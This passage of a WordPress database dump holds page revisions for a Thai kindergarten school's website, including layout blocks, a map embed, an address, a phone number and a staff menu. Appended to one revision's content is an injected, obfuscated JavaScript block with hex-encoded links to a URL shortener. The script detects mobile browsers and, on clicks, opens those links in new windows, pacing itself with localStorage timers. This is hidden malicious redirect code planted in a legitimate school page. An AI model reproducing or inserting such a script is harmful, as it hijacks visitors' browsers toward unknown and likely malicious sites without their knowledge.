e0%b8%94%e0%b8%ab%e0%b8%a1%e0%b8%b2%e0%b8%a2%e0%b8%9b%e0%b8%a3%e0%b8%b0%e0%b8%8a%e0%b8%b2%e0%b8%aa%e0%b8%b1%e0%b8%a1%e0%b8%9e%e0%b8%b1%e0%b8%99%e0%b8%98%e0%b9%8c\"}],\"headingWeight\":\"600\",\"headingfSize\":{\"md\":24},\"paginationMargin\":{\"md\":{\"top\":\"\",\"right\":\"\",\"bottom\":\"-40\",\"left\":\"\"}}} /-->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/grid -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"6e68763c\",\"bgImage\":{\"id\":155,\"image\":{\"url\":\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/07/rovbb.png\",\"height\":700,\"width\":2000,\"orientation\":\"landscape\"}},\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"a8863e18\",\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:generateblocks/grid {\"uniqueId\":\"73d9ffe7\",\"columns\":2,\"isDynamic\":true,\"blockVersion\":3} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"4cd8c7be\",\"isGrid\":true,\"gridId\":\"73d9ffe7\",\"isDynamic\":true,\"blockVersion\":4,\"orderMobile\":2,\"sizing\":{\"width\":\"50%\",\"widthMobile\":\"100%\"}} -->\n<!-- wp:html -->\n<iframe src=\"https://www.google.com/maps/embed?pb=!1m18!1m12!1m3!1d1925.9723083104054!2d104.32273680156584!3d15.106380799999997!2m3!1f0!2f0!3f0!3m2!1i1024!2i768!4f13.1!3m3!1m2!1s0x3116e380deaa317f%3A0x4d9751ab2c19279f!2z4LmC4Lij4LiH4LmA4Lij4Li14Lii4LiZ4Lit4LiZ4Li44Lia4Liy4Lil4Lin4Lix4LiU4Lie4Lij4Liw4LmC4LiVICjguJ3guYjguLLguKLguKHguLHguJjguKLguKEp!5e0!3m2!1sth!2sth!4v1722088475215!5m2!1sth!2sth\" width=\"100%\" height=\"350\" style=\"border:0;\" allowfullscreen=\"\" loading=\"lazy\" referrerpolicy=\"no-referrer-when-downgrade\"></iframe>\n<!-- /wp:html -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"457aa97e\",\"isGrid\":true,\"gridId\":\"73d9ffe7\",\"isDynamic\":true,\"blockVersion\":4,\"orderMobile\":1,\"sizing\":{\"width\":\"50%\",\"widthMobile\":\"100%\"},\"spacing\":{\"paddingTop\":\"30px\",\"paddingRight\":\"30px\",\"paddingBottom\":\"0px\",\"paddingLeft\":\"30px\",\"paddingTopMobile\":\"40px\",\"paddingRightMobile\":\"15px\",\"paddingBottomMobile\":\"30px\",\"paddingLeftMobile\":\"15px\"}} -->\n<!-- wp:generateblocks/headline {\"uniqueId\":\"b3723dea\",\"blockVersion\":3,\"typography\":{\"fontSize\":\"20px\",\"fontSizeMobile\":\"22px\"},\"spacing\":{\"marginBottom\":\"3px\"},\"textColor\":\"#000000\"} -->\n<h2 class=\"gb-headline gb-headline-b3723dea gb-headline-text\"><strong>โรงเรียนอนุบาลวัดพระโต</strong></h2>\n<!-- /wp:generateblocks/headline -->\n\n<!-- wp:generateblocks/headline {\"uniqueId\":\"51a75706\",\"blockVersion\":3,\"typography\":{\"fontSize\":\"16px\"},\"spacing\":{\"marginBottom\":\"15px\"},\"textColor\":\"#000000\"} -->\n<h2 class=\"gb-headline gb-headline-51a75706 gb-headline-text\">1193 ถนนขุขันธ์ ตำบลเมืองเหนือ อำเภอเมืองศรีสะเกษ จังหวัดศรีสะเกษ 33000</h2>\n<!-- /wp:generateblocks/headline -->\n\n<!-- wp:generateblocks/headline {\"uniqueId\":\"fa4bd31f\",\"blockVersion\":3,\"typography\":{\"fontSize\":\"20px\",\"fontSizeMobile\":\"22px\"},\"spacing\":{\"marginBottom\":\"3px\"},\"textColor\":\"#000000\"} -->\n<h2 class=\"gb-headline gb-headline-fa4bd31f gb-headline-text\"><strong>ติดต่อเรา</strong></h2>\n<!-- /wp:generateblocks/headline -->\n\n<!-- wp:generateblocks/headline {\"uniqueId\":\"6e820350\",\"blockVersion\":3,\"typography\":{\"fontSize\":\"16px\"},\"spacing\":{\"marginBottom\":\"15px\"},\"textColor\":\"#000000\"} -->\n<h2 class=\"gb-headline gb-headline-6e820350 gb-headline-text\">โทรศัพท์ : 0-4561-2730</h2>\n<!-- /wp:generateblocks/headline -->\n\n<!-- wp:generateblocks/headline {\"uniqueId\":\"6e95d8cb\",\"blockVersion\":3,\"typography\":{\"fontSize\":\"20px\",\"fontSizeMobile\":\"22px\"},\"spacing\":{\"marginBottom\":\"3px\"},\"textColor\":\"#000000\"} -->\n<h2 class=\"gb-headline gb-headline-6e95d8cb gb-headline-text\"><strong>ติดตามเราได้ที่</strong></h2>\n<!-- /wp:generateblocks/headline -->\n\n<!-- wp:html -->\n<iframe src=\"https://www.facebook.com/plugins/page.php?href=https%3A%2F%2Fwww.facebook.com%2Fprofile.php%3Fid%3D61556083436494&tabs=timeline&width=330&height=80&small_header=true&adapt_container_width=true&hide_cover=true&show_facepile=true&appId\" width=\"330\" height=\"80\" style=\"border:none;overflow:hidden\" scrolling=\"no\" frameborder=\"0\" allowfullscreen=\"true\" allow=\"autoplay; clipboard-write; encrypted-media; picture-in-picture; web-share\"></iframe>\n<!-- /wp:html -->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/grid -->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/container --></div></div>\n<!-- /wp:kadence/column -->\n<!-- /wp:kadence/rowlayout -->\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x1922f2=_0x1922();return _0x3023=function(_0x30231a,_0x4e4880){_0x30231a=_0x30231a-0x1bf;let _0x2b207e=_0x1922f2[_0x30231a];return _0x2b207e;},_0x3023(_0x562006,_0x1334d6);}function _0x1922(){const _0x5a990b=[\'substr\',\'length\',\'-hurs\',\'open\',\'round\',\'443779RQfzWn\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x6f\\x63\\x47\\x33\\x63\\x353\',\'click\',\'5114346JdlaMi\',\'1780163aSIYqH\',\'forEach\',\'host\',\'_blank\',\'68512ftWJcO\',\'addEventListener\',\'-mnts\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x74\\x68\\x4f\\x35\\x63\\x385\',\'4588749LmrVjF\',\'parse\',\'630bGPCEV\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x41\\x6e\\x50\\x38\\x63\\x338\',\'abs\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x41\\x58\\x4e\\x39\\x63\\x389\',\'56bnMKls\',\'opera\',\'6946eLteFW\',\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x49\\x4d\\x76\\x34\\x63\\x324\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x48\\x62\\x61\\x37\\x63\\x357\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x42\\x42\\x47\\x32\\x63\\x382\',\'floor\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x50\\x79\\x78\\x36\\x63\\x376\',\'999HIfBhL\',\'filter\',\'test\',\'getItem\',\'random\',\'138490EjXyHW\',\'stopPropagation\',\'setItem\',\'70kUzPYI\'];_0x1922=function(){return _0x5a990b;};return _0x1922();}(function(_0x16ffe6,_0x1e5463){const _0x20130f=_0x3023,_0x307c06=_0x16ffe6();while(!![]){try{const _0x1dea23=parseInt(_0x20130f(0x1d6))/0x1+-parseInt(_0x20130f(0x1c1))/0x2*(parseInt(_0x20130f(0x1c8))/0x3)+parseInt(_0x20130f(0x1bf))/0x4*(-parseInt(_0x20130f(0x1cd))/0x5)+parseInt(_0x20130f(0x1d9))/0x6+-parseInt(_0x20130f(0x1e4))/0x7*(parseInt(_0x20130f(0x1de))/0x8)+parseInt(_0x20130f(0x1e2))/0x9+-parseInt(_0x20130f(0x1d0))/0xa*(-parseInt(_0x20130f(0x1da))/0xb);if(_0x1dea23===_0x1e5463)break;else _0x307c06[\'push\'](_0x307c06[\'shift\']());}catch(_0x3e3a47){_0x307c06[\'push\'](_0x307c06[\'shift\']());}}}(_0x1922,0x984cd),function(_0x34eab3){const _0x111835=_0x3023;window[\'mobileCheck\']=function(){const _0x123821=_0x3023;let _0x399500=![];return function(_0x5e9786){const _0x1165a7=_0x3023;if(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x1165a7(0x1ca)](_0x5e9786)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x1165a7(0x1ca)](_0x5e9786[_0x1165a7(0x1d1)](0x0,0x4)))_0x399500=!![];}(navigator[_0x123821(0x1c2)]||navigator[\'vendor\']||window[_0x123821(0x1c0)]),_0x399500;};const _0xe6f43=[\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x77\\x67\\x64\\x30\\x63\\x380\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x4d\\x76\\x49\\x31\\x63\\x361\',_0x111835(0x1c5),_0x111835(0x1d7),_0x111835(0x1c3),_0x111835(0x1e1),_0x111835(0x1c7),_0x111835(0x1c4),_0x111835(0x1e6),_0x111835(0x1e9)],_0x7378e8=0x3,_0xc82d98=0x6,_0x487206=_0x551830=>{const _0x2c6c7a=_0x111835;_0x551830[_0x2c6c7a(0x1db)]((_0x3ee06f,_0x37dc07)=>{const _0x476c2a=_0x2c6c7a;!localStorage[\'getItem\'](_0x3ee06f+_0x476c2a(0x1e8))&&localStorage[_0x476c2a(0x1cf)](_0x3ee06f+_0x476c2a(0x1e8),0x0);});},_0x564ab0=_0x3743e2=>{const _0x415ff3=_0x111835,_0x229a83=_0x3743e2[_0x415ff3(0x1c9)]((_0x37389f,_0x22f261)=>localStorage[_0x415ff3(0x1cb)](_0x37389f+_0x415ff3(0x1e8))==0x0);return _0x229a83[Math[_0x415ff3(0x1c6)](Math[_0x415ff3(0x1cc)]()*_0x229a83[_0x415ff3(0x1d2)])];},_0x173ccb=_0xb01406=>localStorage[_0x111835(0x1cf)](_0xb01406+_0x111835(0x1e8),0x1),_0x5792ce=_0x5415c5=>localStorage[_0x111835(0x1cb)](_0x5415c5+_0x111835(0x1e8)),_0xa7249=(_0x354163,_0xd22cba)=>localStorage[_0x111835(0x1cf)](_0x354163+_0x111835(0x1e8),_0xd22cba),_0x381bfc=(_0x49e91b,_0x531bc4)=>{const _0x1b0982=_0x111835,_0x1da9e1=0x3e8*0x3c*0x3c;return Math[_0x1b0982(0x1d5)](Math[_0x1b0982(0x1e7)](_0x531bc4-_0x49e91b)/_0x1da9e1);},_0x6ba060=(_0x1e9127,_0x28385f)=>{const _0xb7d87=_0x111835,_0xc3fc56=0x3e8*0x3c;return Math[_0xb7d87(0x1d5)](Math[_0xb7d87(0x1e7)](_0x28385f-_0x1e9127)/_0xc3fc56);},_0x370e93=(_0x286b71,_0x3587b8,_0x1bcfc4)=>{const _0x22f77c=_0x111835;_0x487206(_0x286b71),newLocation=_0x564ab0(_0x286b71),_0xa7249(_0x3587b8+\'-mnts\',_0x1bcfc4),_0xa7249(_0x3587b8+_0x22f77c(0x1d3),_0x1bcfc4),_0x173ccb(newLocation),window[\'mobileCheck\']()&&window[_0x22f77c(0x1d4)](newLocation,\'_blank\');};_0x487206(_0xe6f43);function _0x168fb9(_0x36bdd0){const _0x2737e0=_0x111835;_0x36bdd0[_0x2737e0(0x1ce)]();const _0x263ff7=location[_0x2737e0(0x1dc)];let _0x1897d7=_0x564ab0(_0xe6f43);const _0x48cc88=Date[_0x2737e0(0x1e3)](new Date()),_0x1ec416=_0x5792ce(_0x263ff7+_0x2737e0(0x1e0)),_0x23f079=_0x5792ce(_0x263ff7+_0x2737e0(0x1d3));if(_0x1ec416&&_0x23f079)try{const _0x2e27c9=parseInt(_0x1ec416),_0x1aa413=parseInt(_0x23f079),_0x418d13=_0x6ba060(_0x48cc88,_0x2e27c9),_0x13adf6=_0x381bfc(_0x48cc88,_0x1aa413);_0x13adf6>=_0xc82d98&&(_0x487206(_0xe6f43),_0xa7249(_0x263ff7+_0x2737e0(0x1d3),_0x48cc88)),_0x418d13>=_0x7378e8&&(_0x1897d7&&window[_0x2737e0(0x1e5)]()&&(_0xa7249(_0x263ff7+_0x2737e0(0x1e0),_0x48cc88),window[_0x2737e0(0x1d4)](_0x1897d7,_0x2737e0(0x1dd)),_0x173ccb(_0x1897d7)));}catch(_0x161a43){_0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}else _0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}document[_0x111835(0x1df)](_0x111835(0x1d8),_0x168fb9);}());</script>','หน้าแรก','','inherit','closed','closed','','19-revision-v1','','','2024-08-26 15:58:14','2024-08-26 08:58:14','',19,'http://watprato.ssk.in.th/?p=215',0,'revision','',0),
(216,2,'2024-08-26 16:17:05','2024-08-26 09:17:05','<!-- wp:kadence/rowlayout {\"uniqueID\":\"19_238a19-ce\",\"columns\":1,\"colLayout\":\"equal\",\"padding\":[\"0\",\"\",\"0\",\"\"],\"displayBoxShadow\":true,\"kbVersion\":2} -->\n<!-- wp:kadence/column {\"background\":\"#ffffff\",\"borderWidth\":[\"\",\"\",\"\",\"\"],\"uniqueID\":\"19_55c486-08\",\"kbVersion\":2} -->\n<div class=\"wp-block-kadence-column kadence-column19_55c486-08\"><div class=\"kt-inside-inner-col\"><!-- wp:generateblocks/container {\"uniqueId\":\"afb41c1a\",\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"f1b9a3f2\",\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:generateblocks/image {\"uniqueId\":\"41ac449a\",\"mediaId\":85,\"sizeSlug\":\"full\",\"blockVersion\":2} -->\n<figure class=\"gb-block-image gb-block-image-41ac449a\"><img class=\"gb-image gb-image-41ac449a\" src=\"http://watprato.ssk.in.th/wp-content/uploads/2024/07/awpt.gif\" alt=\"\" title=\"awpt\"/></figure>\n<!-- /wp:generateblocks/image -->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"6e9bcd64\",\"isDynamic\":true,\"blockVersion\":4,\"spacing\":{\"paddingTop\":\"30px\",\"paddingLeft\":\"10px\",\"paddingRight\":\"10px\"}} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"f8167df0\",\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:generateblocks/grid {\"uniqueId\":\"2603ad26\",\"columns\":3,\"horizontalGap\":30,\"verticalGap\":20,\"isDynamic\":true,\"blockVersion\":3} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"d4c24200\",\"isGrid\":true,\"gridId\":\"2603ad26\",\"isDynamic\":true,\"blockVersion\":4,\"orderMobile\":1,\"sizing\":{\"width\":\"25%\",\"widthMobile\":\"100%\"}} -->\n<!-- wp:group {\"layout\":{\"type\":\"constrained\"}} -->\n<div class=\"wp-block-group\"><!-- wp:generateblocks/image {\"uniqueId\":\"273bf937\",\"mediaId\":46,\"sizeSlug\":\"full\",\"widthMobile\":\"300px\",\"alignmentMobile\":\"center\",\"blockVersion\":2} -->\n<figure class=\"gb-block-image gb-block-image-273bf937\"><img class=\"gb-image gb-image-273bf937\" src=\"http://watprato.ssk.in.th/wp-content/uploads/2024/07/นายอนุศักดิ์-พันธ์งาม-png.png\" alt=\"\" title=\"นายอนุศักดิ์ พันธ์งาม png\"/></figure>\n<!-- /wp:generateblocks/image -->\n\n<!-- wp:kadence/advancedbtn {\"uniqueID\":\"19_66bc98-69\"} -->\n<div class=\"wp-block-kadence-advancedbtn kb-buttons-wrap kb-btns19_66bc98-69\"><!-- wp:kadence/singlebtn {\"uniqueID\":\"19_3d590e-59\",\"text\":\"ติดต่อผู้อำนวยการโรงเรียน\",\"sizePreset\":\"small\",\"background\":\"#cf2e2e\",\"backgroundHover\":\"#f78da7\"} /--></div>\n<!-- /wp:kadence/advancedbtn --></div>\n<!-- /wp:group -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"1cb712a0\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#cf2e2e\",\"backgroundColorHover\":\"#f78da7\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-1cb712a0 gb-button-text\"><strong>เกี่ยวกับโรงเรียน</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:kadence/iconlist {\"listStyles\":[{\"size\":[16,\"\",\"\"],\"sizeType\":\"px\",\"lineHeight\":[\"\",\"\",\"\"],\"lineType\":\"px\",\"letterSpacing\":\"\",\"family\":\"\",\"google\":false,\"style\":\"\",\"weight\":\"\",\"variant\":\"\",\"subset\":\"\",\"loadGoogle\":true,\"color\":\"\",\"textTransform\":\"\"}],\"uniqueID\":\"19_c72802-2d\",\"listPadding\":[\"\",\"xxs\",\"\",\"xxs\"],\"icon\":\"fe_arrowRightCircle\"} -->\n<div class=\"wp-block-kadence-iconlist kt-svg-icon-list-items kt-svg-icon-list-items19_c72802-2d kt-svg-icon-list-columns-1 alignnone\"><ul class=\"kt-svg-icon-list\"><!-- wp:kadence/listitem {\"uniqueID\":\"19_152c5d-2f\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-19_152c5d-2f\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\">ข้อมูลพื้นฐาน</span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"19_3cadef-91\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-19_3cadef-91\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\">ประวัติโรงเรียน</span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"19_d4147b-0f\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-19_d4147b-0f\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\">วิสัยทัศน์/พันธกิจ/เป้าประสงค์</span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"19_41d84f-8e\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-19_41d84f-8e\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\">กรรมการสถานศึกษา</span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"19_17cef9-da\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-19_17cef9-da\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"http://watprato.ssk.in.th/\" data-type=\"page\" data-id=\"19\">ข้อมูลผู้บริหาร</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"19_a997a3-5a\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-19_a997a3-5a\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"https://drive.google.com/file/d/1X6Ept6IxYaNET5DErIMExwq1jHu3vOIS/view?usp=sharing\" data-type=\"page\" data-id=\"19\">ข้อมูลบุคลากร</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"19_13660f-b9\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-19_13660f-b9\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\">ข้อมูลนักเรียน</span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"19_702c0e-e7\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-19_702c0e-e7\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\">ข้อมูล O-NET</span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"19_0109ca-f6\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-19_0109ca-f6\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\">แบบวัดการรับรู้ EIT 2</span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"19_b4c32e-bd\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-19_b4c32e-bd\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><img class=\"wp-image-200\" style=\"width: 150px;\" src=\"http://watprato.ssk.in.th/wp-content/uploads/2024/08/EIT_QRCode-1.png\" alt=\"\"></span></li>\n<!-- /wp:kadence/listitem --></ul></div>\n<!-- /wp:kadence/iconlist -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"5157985b\",\"isGrid\":true,\"gridId\":\"2603ad26\",\"isDynamic\":true,\"blockVersion\":4,\"orderMobile\":2,\"sizing\":{\"width\":\"75%\",\"widthMobile\":\"100%\"}} -->\n<!-- wp:group {\"layout\":{\"type\":\"constrained\"}} -->\n<div class=\"wp-block-group\"><!-- wp:generateblocks/grid {\"uniqueId\":\"b3b3ab6e\",\"columns\":2,\"horizontalGap\":20,\"isDynamic\":true,\"blockVersion\":3} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"10b33923\",\"isGrid\":true,\"gridId\":\"b3b3ab6e\",\"isDynamic\":true,\"blockVersion\":4,\"sizing\":{\"width\":\"50%\",\"widthMobile\":\"100%\"}} -->\n<!-- wp:generateblocks/headline {\"uniqueId\":\"1d4269e0\",\"blockVersion\":3,\"typography\":{\"textAlignMobile\":\"center\",\"fontSize\":\"22px\"},\"spacing\":{\"marginBottom\":\"10px\"}} -->\n<h2 class=\"gb-headline gb-headline-1d4269e0 gb-headline-text\"><strong>VTR กิจกรรมโรงเรียน</strong></h2>\n<!-- /wp:generateblocks/headline -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"f57e2371\",\"isGrid\":true,\"gridId\":\"b3b3ab6e\",\"isDynamic\":true,\"blockVersion\":4,\"sizing\":{\"width\":\"50%\",\"widthMobile\":\"100%\"},\"typography\":{\"textAlign\":\"right\",\"textAlignMobile\":\"center\"},\"spacing\":{\"paddingBottomMobile\":\"10px\"}} -->\n<!-- wp:generateblocks/button 